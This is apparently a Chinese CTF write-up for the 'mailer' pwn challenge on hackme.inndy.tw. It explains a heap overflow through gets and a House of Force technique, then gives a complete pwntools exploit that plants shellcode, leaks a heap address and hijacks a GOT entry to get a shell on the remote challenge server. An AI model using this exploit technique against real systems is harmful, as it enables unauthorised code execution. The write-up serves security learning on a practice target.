×

mailer

96
D4rk3r
2018.09.21 12:24* 字数 169
保护

有RWX段而且没开NX,所以有可能要写shellcode

dump_mail
write_mail

程序很简单就两个功能,漏洞点是write_mail函数的两个gets函数造成了堆溢出,可以控制topchunk_size,以及自由地控制堆分配尺寸的大小,所以可以使用House Of Force

利用方法:

1.增加一个mail,利用溢出修改size大小,content填入shellcode
2.再增加一个mail,利用溢出修改top_chunk
3.通过dump_mail 函数泄漏第一个mail的堆地址,从而计算需要抬高topchunk的偏移以及shellcode地址
4.使用house of force修改printf_got地址为shellcode地址来getshell

完整exp:

from pwn import *
context.log_level = 'debug'
context(arch = 'i386')
#p = process('./mailer')
p = remote('hackme.inndy.tw',7721)
elf = ELF('./mailer')

def write(length,title,content):
    p.sendlineafter('Action: ','1')
    p.sendlineafter('Length: ',str(length))
    p.sendlineafter('Title: ',title)
    p.sendlineafter('Content: ',content)

def dump():
    p.sendlineafter('Action: ','2')


#leak heap_addr
shellcode = asm(shellcraft.sh())
write(50,'aa' + '\x00'*62 + p32(60),shellcode)
write(10,'bb','bb' + '\x00'*10 + p32(0xffffffff))
dump()
p.recvuntil('\x59\x00\x00\x00')
heap_addr = u32(p.recv(4))
log.success('heap addr : 0x%x'%heap_addr)
#gdb.attach(p,'b *'+str(0x080486B9))


topchunk_offset = 0xd0
topchunk_addr = heap_addr + topchunk_offset
#SIZE_SZ = 4
malloc_size = (elf.got['puts'] - 0x8 - 0x4 - 0x28) - topchunk_addr - 4
shellcode_addr = heap_addr + 72
#print hex(shellcode_addr)
write(malloc_size-72,'cc','cc')


#hijack printf_got --> shellcode_addr
p.sendlineafter('Action: ','1')
p.sendlineafter('Length: ','30')
p.sendlineafter('Title: ',p32(shellcode_addr)*10)


p.interactive()
hackme.inndy_wp
Web note ad 1